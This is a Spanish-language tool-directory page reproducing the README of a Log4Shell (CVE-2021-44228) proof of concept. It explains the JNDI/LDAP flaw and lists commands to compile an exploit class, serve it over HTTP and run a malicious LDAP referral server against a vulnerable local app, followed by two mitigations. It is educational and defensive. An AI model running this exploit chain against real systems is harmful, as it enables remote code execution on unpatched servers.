Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44228-PoC — CVE-2021-44228 (Log4Shell) Prueba de concepto | Kitploit
Herramientas/GitHubGitHub/sunnyvale-it/cve-2021-44228-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubsunnyvale-it/cve-2021-44228-poc

CVE-2021-44228-PoC

CVE-2021-44228 (Log4Shell) Prueba de concepto

Ver Repositorio
854hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-44228 (Log4Shell) Prueba de concepto

Las funciones JNDI de Apache Log4j2 <=2.14.1 utilizadas en la configuración, los mensajes de registro y los parámetros no protegen contra LDAP controlado por el atacante y otros endpoints relacionados con JNDI. Un atacante que pueda controlar los mensajes de registro o los parámetros de los mensajes de registro puede ejecutar código arbitrario cargado desde servidores LDAP cuando la sustitución de búsqueda de mensajes está habilitada.

Para ayudar a los clientes a entender cómo funciona esta falla, hemos preparado este repositorio con una prueba de concepto simple pero funcional.

Requisitos previos

Tener instalado localmente:

  • Git
  • JDK 11
  • Maven
  • Python

Por el momento, el código arbitrario lanza la aplicación Calculadora en macOS o Windows, por lo que solo estos dos sistemas operativos son compatibles con este PoC.

Aviso legal

Toda la información y el código se proporcionan únicamente con fines educativos y/o para probar sus propios sistemas en busca de esta vulnerabilidad.

La técnica de ataque

Este PoC se asemeja a lo descrito en la imagen de abajo (créditos GovCERT.ch), a excepción del servidor vulnerable, que es solo una clase Java simple para mayor simplicidad. Es importante entender que esta vulnerabilidad puede ser desencadenada de varias formas; lo que se describe a continuación es solo una de ellas.

Cómo ejecutar el PoC

Clona este repositorio

root@kitploit:~
terminal1 $ git clone https://github.com/sunnyvale-it/CVE-2021-44228-PoC.git

Compila el exploit (usando JDK 11)

root@kitploit:~
terminal1 $ javac Exploit.java

Ejecuta un servidor HTTP para servir el exploit

root@kitploit:~
terminal1 $ python -m SimpleHTTPServer 8888 --directory .

Inicia el LDAPRefServer malicioso (gracias a https://github.com/mbechler/marshalsec)

root@kitploit:~
terminal2 $ java -cp tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

Lanza la aplicación defectuosa (que contiene log4j 2.14.1)

root@kitploit:~
terminal3 $ mvn package && mvn exec:exec

Si todo salió bien, la aplicación Calculadora (ejecución de código arbitrario) debería aparecer

Mitigaciones rápidas (funcionan en versiones de Log4J desde la 2.10.0 hasta la 2.14.1)

Establecer la variable de entorno LOG4J_FORMAT_MSG_NO_LOOKUPS en true

root@kitploit:~
terminal3 $ export LOG4J_FORMAT_MSG_NO_LOOKUPS=true 
root@kitploit:~
terminal3 $ mvn package && mvn exec:exec

En este caso, la Calculadora ya no debería aparecer

Ejecutar la aplicación con la propiedad de sistema log4j2.formatMsgNoLookups establecida en true

root@kitploit:~
terminal3 $ mvn package && mvn exec:exec -Dlog4j2.formatMsgNoLookups=true

En este caso, la Calculadora ya no debería aparecer

Descargar herramienta